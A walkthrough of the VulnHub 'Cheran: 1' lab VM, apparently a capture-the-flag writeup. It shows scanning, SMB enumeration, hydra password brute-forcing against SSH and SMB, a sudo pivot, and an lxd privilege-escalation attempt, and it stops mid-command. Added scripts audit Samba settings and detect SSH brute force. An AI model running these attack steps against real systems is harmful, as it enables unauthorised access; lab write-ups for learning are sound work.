Cheran EE
Target information
Name: Cheran: 1
URL:
https://www.vulnhub.com/entry/cheran-1,521/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:92:75:55 1 60 PCS Systemtechnik GmbH
192.168.56.201 08:00:27:7f:80:62 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.201.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.201 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 21:49 EST
Nmap scan report for 192.168.56.201
Host is up (0.00012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 38201e427ad6a92a016258f3b637d841 (RSA)
| 256 e8c15a147ac60924b60ac005e48203d9 (ECDSA)
|_ 256 91b9e9b9e7837a287148c4589b397ba1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: A complete list of Chera Rulers and their contribution
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:7F:80:62 (Oracle VirtualBox virtual NIC)
Service Info: Host: UBUNTU; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h50m02s, deviation: 3h10m31s, median: -2s
| smb2-time:
| date: 2023-01-31T02:49:55
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: ubuntu
| NetBIOS computer name: UBUNTU\x00
| Domain name: \x00
| FQDN: ubuntu
|_ System time: 2023-01-31T08:19:55+05:30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.39 seconds
The NMAP scan shows that the target host has 4 open ports: 22 (SSH), 80 (HTTP) and 139/445 (SMB).
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ smbclient -L 192.168.56.201
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (ubuntu server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP UBUNTU
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ enum4linux 192.168.56.201
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jan 30 21:51:29 2023
=========================================( Target Information )=========================================
Target ........... 192.168.56.201
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.56.201 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 192.168.56.201 )===============================
Looking up status of 192.168.56.201
UBUNTU <00> - B <ACTIVE> Workstation Service
UBUNTU <03> - B <ACTIVE> Messenger Service
UBUNTU <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
==================================( Session Check on 192.168.56.201 )==================================
[+] Server 192.168.56.201 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.56.201 )===============================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 192.168.56.201 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.56.201 from srvinfo:
UBUNTU Wk Sv PrQ Unx NT SNT ubuntu server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
======================================( Users on 192.168.56.201 )======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
================================( Share Enumeration on 192.168.56.201 )================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (ubuntu server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP UBUNTU
[+] Attempting to map shares on 192.168.56.201
//192.168.56.201/print$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.56.201/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 192.168.56.201 )===========================
[+] Attaching to 192.168.56.201 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] UBUNTU
[+] Builtin
[+] Password Info for Domain: UBUNTU
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 192.168.56.201 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 192.168.56.201 via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-865974611-604371542-2155208271 and logon username '', password ''
S-1-5-21-865974611-604371542-2155208271-501 UBUNTU\nobody (Local User)
S-1-5-21-865974611-604371542-2155208271-513 UBUNTU\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cheran (Local User)
S-1-22-1-1001 Unix User\Rajasimha (Local User)
==============================( Getting printer info for 192.168.56.201 )==============================
No printers returned.
enum4linux complete on Mon Jan 30 21:51:40 2023
Enumerating the SMB service reveals two usernames:
cheran
Rajasimha
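The null session, the guest mapping and the optional SMB signing that enum4linux and nmap report above are all governed by a handful of smb.conf parameters. The following script is an added example and not code from the original post or the VM author: it parses a constructed smb.conf fragment that reproduces the weak behaviour, audits the global parameters restrict anonymous, map to guest, server signing and null passwords against their Samba defaults (assumed here from the Samba documentation, not read from the target), and flags any share that sets guest ok = yes. Both sample files are constructed for the example.

```python
import configparser
import io

# Constructed smb.conf fragment reproducing what the scans above observed:
# null sessions accepted, unknown users mapped to guest, signing not required.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = ubuntu server
   map to guest = Bad User
   restrict anonymous = 0
   server signing = disabled

[print$]
   path = /var/lib/samba/printers
   guest ok = no
"""

# The same file with the values a defender would set instead.
HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = ubuntu server
   map to guest = Never
   restrict anonymous = 2
   server signing = mandatory
   null passwords = no
"""

# (parameter, Samba default when unset, predicate that is True for a weak value, finding text)
GLOBAL_CHECKS = [
    ("restrict anonymous", "0",
     lambda v: v != "2",
     "anonymous (null-session) access is not fully restricted; set 'restrict anonymous = 2'"),
    ("map to guest", "Never",
     lambda v: v.lower() != "never",
     "unknown users are mapped to the guest account; set 'map to guest = Never'"),
    ("server signing", "default",
     lambda v: v.lower() != "mandatory",
     "SMB signing is not required; set 'server signing = mandatory'"),
    ("null passwords", "no",
     lambda v: v.lower() in ("yes", "true", "1"),
     "empty passwords are accepted; set 'null passwords = no'"),
]


def parse_smb_conf(text):
    """Parse smb.conf (INI-style, keys case-insensitive) into a ConfigParser."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_file(io.StringIO(text))
    return cp


def audit_smb_conf(text):
    """Return findings for the [global] section plus any share readable as guest."""
    cp = parse_smb_conf(text)
    findings = []
    glob = cp["global"] if cp.has_section("global") else {}
    for key, default, is_weak, message in GLOBAL_CHECKS:
        value = glob.get(key, default).strip()      # unset parameter -> Samba default
        if is_weak(value):
            findings.append(f"[global] {key} = {value}: {message}")
    for share in cp.sections():
        if share == "global":
            continue
        if cp[share].get("guest ok", "no").strip().lower() in ("yes", "true", "1"):
            findings.append(f"[{share}] guest ok = yes: share is readable without credentials")
    return findings


if __name__ == "__main__":
    for finding in audit_smb_conf(WEAK_SMB_CONF):
        print(finding)
    print("hardened file findings:", audit_smb_conf(HARDENED_SMB_CONF))
```

Running the script lists three findings for the weak file and none for the hardened one. One caveat before deploying the hardened values: restrict anonymous = 2 also refuses anonymous connections to IPC$, which some older Windows clients rely on for network browsing, so check real clients still work after the change.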
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/robots.txt
/*
/users
/youtube
Browsing the /users directory:
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/users/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /users</title>
</head>
<body>
<h1>Index of /users</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="Rajasimha.html">Rajasimha.html</a></td><td align="right">2020-07-29 13:02 </td><td align="right">1.0K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="cheran.html">cheran.html</a></td><td align="right">2020-07-29 12:19 </td><td align="right">176 </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.201 Port 80</address>
</body></html>
Visiting each file under the /users directory:
http://192.168.56.201/users/cheran.html
Download the image on that page to the local Kali Linux machine.
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/users/Rajasimha.html
<!DOCTYPE html>
<html>
<head>
<title>Rajasimha</title>
</head>
<body>
Find me...
</body>
</html>
<!--
+++++ +++[- >++++ ++++< ]>+++ .<+++ +++[- >++++ ++<]> +++++ +++.- .----
---.< +++[- >+++< ]>++. <++++ [->-- --<]> -.<++ ++[-> ++++< ]>+++ .-.<+
+++++ ++[-> ----- ---<] >---- ---.< +++[- >---< ]>--- .<+++ +[->- ---<]
>---. ---.+ ++.-- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ .<+++ +[->+
+++<] >++++ .+.<+ ++[-> +++<] >+.<+ +++++ +++[- >---- ----- <]>-- .<+++
+++++ [->++ +++++ +<]>+ +++++ +++.< +++[- >+++< ]>+.< +++++ ++++[ ->---
----- -<]>- -.<++ +++++ ++[-> +++++ ++++< ]>+++ .<+++ [->-- -<]>- --.--
-.<++ +++++ +[->- ----- --<]> ----- .<+++ ++++[ ->+++ ++++< ]>+++ +.<++
+++[- >++++ +<]>+ ++++. <+++[ ->--- <]>-- ---.< +++[- >+++< ]>+++ +.---
-.<++ +[->- --<]> ----. <+++[ ->+++ <]>++ +.--- ----- .<+++ ++++[ ->---
----< ]>--- ---.. .<+++ ++[-> ----- <]>-- ----- -.--- .<
-->
This page contains an encoded message; it is brainfuck, so decode it.
Decode it with the online tool:
https://www.splitbrain.org/services/ook
Decoded output:
Congrats,
This is the Username...
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ ls
Chera-Dynasty.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ steghide extract -sf Chera-Dynasty.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ stegseek Chera-Dynasty.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.48% (132.7 MB)
[!] error: Could not find a valid passphrase.
At this point two candidate usernames are known; before trying to crack their passwords, run a directory scan first:
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/youtube/youtube.html
<!DOCTYPE html>
<html>
<title>Youtube</title>
<body>
<h1>Shadow Phreak</h1>
<a href="http://www.youtube.com/c/ShadowPhreak">Visit Shadow Phreak Youtube Channel</a>
<p>
<ul>
<li> <a href="https://youtu.be/MvEGnf4CvMk">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/f897aE9V3BI">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/idyEEb7BDLw">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/N_MIArVvZpE">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/chSu9PcXNhI">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/hmWjRM9dViQ">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/jQqbhtw7Faw">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/YnTDqNcbib0">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/_V0QxKe5ufc">Please Subscribe</a> </li>
<li> <a href="https://youtu.be/VLCDnSQf4Vg">Please Subscribe</a> </li>
</ul>
</p>
</body>
<footer>
<p> Author : Mr. S. Premkumar </p>
</footer>
</html>
<!-- U0dsa1pHVnVJRWx1Wm04PQ== -->
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ echo 'U0dsa1pHVnVJRWx1Wm04PQ==' | base64 -d
SGlkZGVuIEluZm8=
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ echo 'U0dsa1pHVnVJRWx1Wm04PQ==' | base64 -d | base64 -d
Hidden Info
I don't know what "Hidden Info" means; set it aside for now.
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ curl http://192.168.56.201/admin.php
<!DOCTYPE html>
<html>
<body>
<?php
echo "The way you are going is wrong...";
?>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ gobuster dir -u http://192.168.56.201 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.201
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/01/30 22:11:38 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.201/images/]
/index.html (Status: 200) [Size: 21614]
/.html (Status: 403) [Size: 279]
/users (Status: 301) [Size: 316] [--> http://192.168.56.201/users/]
/admin.php (Status: 200) [Size: 100]
/robots.txt (Status: 200) [Size: 21]
/youtube (Status: 301) [Size: 318] [--> http://192.168.56.201/youtube/]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1101025 / 1102805 (99.84%)===============================================================
2023/01/30 22:13:36 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l Rajasimha -P /usr/share/wordlists/rockyou.txt smb://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:49:39
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.56.201:445/
[445][smb] Host: 192.168.56.201 Account: Rajasimha Error: Invalid account (Anonymous success)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-30 22:49:51
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l cheran -P /usr/share/wordlists/rockyou.txt smb://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:50:11
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.56.201:445/
[445][smb] Host: 192.168.56.201 Account: cheran Error: Invalid account (Anonymous success)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-30 22:50:13
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l Rajasimha -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:15:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.201:22/
[STATUS] 156.00 tries/min, 156 tries in 00:01h, 14344245 to do in 1532:31h, 14 active
[STATUS] 117.00 tries/min, 351 tries in 00:03h, 14344050 to do in 2043:19h, 14 active
[STATUS] 102.29 tries/min, 716 tries in 00:07h, 14343685 to do in 2337:12h, 14 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l rajasimha -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:30:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.201:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[STATUS] 113.67 tries/min, 341 tries in 00:03h, 14344061 to do in 2103:15h, 13 active
[STATUS] 95.14 tries/min, 666 tries in 00:07h, 14343736 to do in 2512:40h, 13 active
[STATUS] 96.33 tries/min, 1445 tries in 00:15h, 14342957 to do in 2481:29h, 13 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ hydra -l cheran -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.201
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-30 22:47:12
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.201:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[STATUS] 124.67 tries/min, 374 tries in 00:03h, 14344026 to do in 1917:40h, 15 active
[STATUS] 109.43 tries/min, 766 tries in 00:07h, 14343634 to do in 2184:38h, 15 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
The password was never cracked.
Looking at other people's writeups, this is because I had set the target host to host-only networking: under the /youtube directory there are several links, and one of those links gives the password, k4rur, while the username is the one already guessed: Rajasimha.
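From the defender's side, the hydra runs above leave an unmistakable trace in the target's sshd log: a burst of "Failed password" lines from one source address within seconds, followed (if a guess succeeds) by an "Accepted password" line from the same address. The script below is an added example and not part of the original writeup: it runs a sliding-window count per source IP over a constructed auth.log excerpt and reports bursts and any successful login that follows one. The log lines, the addresses 192.168.56.50 and 192.168.56.60, and the year assumed for the syslog timestamps are all made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed auth.log excerpt (not from the target), modelled on what a password-guessing
# run against sshd looks like: six failures in three seconds from one address, one stray
# failure from another, then a successful login from the first address.
SAMPLE_AUTH_LOG = """\
Jan 30 22:15:05 ubuntu sshd[1201]: Failed password for Rajasimha from 192.168.56.50 port 41022 ssh2
Jan 30 22:15:05 ubuntu sshd[1203]: Failed password for Rajasimha from 192.168.56.50 port 41024 ssh2
Jan 30 22:15:06 ubuntu sshd[1205]: Failed password for Rajasimha from 192.168.56.50 port 41026 ssh2
Jan 30 22:15:06 ubuntu sshd[1207]: Failed password for invalid user rajasimha from 192.168.56.50 port 41028 ssh2
Jan 30 22:15:07 ubuntu sshd[1209]: Failed password for invalid user rajasimha from 192.168.56.50 port 41030 ssh2
Jan 30 22:15:07 ubuntu sshd[1211]: Failed password for cheran from 192.168.56.50 port 41032 ssh2
Jan 30 22:15:08 ubuntu sshd[1213]: Connection closed by authenticating user cheran 192.168.56.50 port 41032 [preauth]
Jan 30 22:20:00 ubuntu sshd[1300]: Failed password for cheran from 192.168.56.60 port 50000 ssh2
Jan 30 22:28:10 ubuntu sshd[1400]: Accepted password for Rajasimha from 192.168.56.50 port 41500 ssh2
"""

SYSLOG_TS = r"(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d)"
FAILED_RE = re.compile(
    SYSLOG_TS + r" \S+ sshd\[\d+\]: Failed password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)
ACCEPTED_RE = re.compile(
    SYSLOG_TS + r" \S+ sshd\[\d+\]: Accepted (?:password|publickey) for "
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_ts(ts, year=2023):
    """syslog timestamps carry no year, so one is assumed (constructed sample)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return findings: per-IP failure bursts, and successful logins that follow a burst."""
    recent = defaultdict(list)   # ip -> failure timestamps inside the current window
    users = defaultdict(set)     # ip -> usernames tried from that ip
    flagged = {}                 # ip -> time the burst was first detected
    findings = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ip, t = m["ip"], parse_ts(m["ts"])
            users[ip].add(m["user"])
            # Drop failures older than the window, measured back from this line.
            recent[ip] = [x for x in recent[ip] if (t - x).total_seconds() <= window_seconds]
            recent[ip].append(t)
            if len(recent[ip]) >= threshold and ip not in flagged:
                flagged[ip] = t
                findings.append(
                    f"{ip}: {len(recent[ip])} failed logins within {window_seconds}s "
                    f"(users tried: {', '.join(sorted(users[ip]))})"
                )
            continue
        m = ACCEPTED_RE.match(line)
        if m and m["ip"] in flagged:
            findings.append(f"{m['ip']}: successful login as {m['user']} after a brute-force burst")
    return findings


if __name__ == "__main__":
    for finding in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(finding)
```

The same counting is what fail2ban's sshd jail automates; on the sshd side, lowering MaxAuthTries in sshd_config and switching from passwords to keys removes the guessable surface altogether. The second finding (a success right after a burst) is the one worth paging on, since it means the guessing worked.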
┌──(kali㉿kali)-[~/Vulnhub/Cheran]
└─$ ssh Rajasimha@192.168.56.201
The authenticity of host '192.168.56.201 (192.168.56.201)' can't be established.
ED25519 key fingerprint is SHA256:bIEC4Rwz61rgp7mqsqUIOiHq+JZ68ACsyG6CaAakEaU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.201' (ED25519) to the list of known hosts.
Rajasimha@192.168.56.201's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jan 31 09:28:00 IST 2023
System load: 0.01 Processes: 96
Usage of /: 27.1% of 9.78GB Users logged in: 0
Memory usage: 54% IP address for enp0s3: 192.168.56.201
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
Last login: Wed Jul 29 20:04:15 2020 from 192.168.1.9
Rajasimha@ubuntu:~$ id
uid=1001(Rajasimha) gid=1001(Rajasimha) groups=1001(Rajasimha)
Rajasimha@ubuntu:~$
Rajasimha@ubuntu:/tmp$ sudo -l
Matching Defaults entries for Rajasimha on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User Rajasimha may run the following commands on ubuntu:
(ALL, !root) /bin/bash
Although /bin/bash can be run through sudo, it cannot be run as root; it can, however, be run as the other user, cheran.
Rajasimha@ubuntu:/tmp$ sudo -u cheran /bin/bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
cheran@ubuntu:/tmp$ id
uid=1000(cheran) gid=1000(cheran) groups=1000(cheran),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),115(sambashare),116(lpadmin)
cheran@ubuntu:/tmp$ sudo -l
[sudo] password for cheran:
Sorry, try again.
[sudo] password for cheran:
Sorry, try again.
[sudo] password for cheran:
sudo: 3 incorrect password attempts
cheran@ubuntu:/tmp$ cd /home/cheran/
cheran@ubuntu:/home/cheran$ ls -alh
total 28K
drwxr-xr-x 4 cheran cheran 4.0K Jul 29 2020 .
drwxr-xr-x 4 root root 4.0K Jul 29 2020 ..
-rw-r--r-- 1 cheran cheran 220 Jul 29 2020 .bash_logout
-rw-r--r-- 1 cheran cheran 3.7K Jul 29 2020 .bashrc
drwx------ 2 cheran cheran 4.0K Jul 29 2020 .cache
drwx------ 3 cheran cheran 4.0K Jul 29 2020 .gnupg
-rw-r--r-- 1 cheran cheran 807 Jul 29 2020 .profile
-rw-r--r-- 1 cheran cheran 0 Jul 29 2020 .sudo_as_admin_successful
cheran@ubuntu:/home/cheran$
cheran@ubuntu:/home/cheran$
cheran is a member of the lxd group, so lxd may be usable for privilege escalation.
But the lxd escalation attempt produced an error:
cheran@ubuntu:/tmp$ lxc image import ./alpine.tar.gz --alias myimage
Error: Unable to read the configuration file: open /home/Rajasimha/.config/lxc/config.yml: permission denied
A very strange error; in fact it is resolved by adding the -i option to the earlier sudo command:
Rajasimha@ubuntu:/tmp$ sudo -i -u cheran /bin/bash
[sudo] password for Rajasimha:
cheran@ubuntu:~$ cd /tmp
cheran@ubuntu:/tmp$ ls
alpine.tar.gz
alpine-v3.13-x86_64-20210218_0139.tar.gz
linpeas.sh
systemd-private-134633a4e12d40a984cc125c2c3816d4-apache2.service-Ui2U0g
systemd-private-134633a4e12d40a984cc125c2c3816d4-systemd-resolved.service-X2Iddq
systemd-private-134633a4e12d40a984cc125c2c3816d4-systemd-timesyncd.service-AM7InD
tmux-1001
cheran@ubuntu:/tmp$ lxc import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
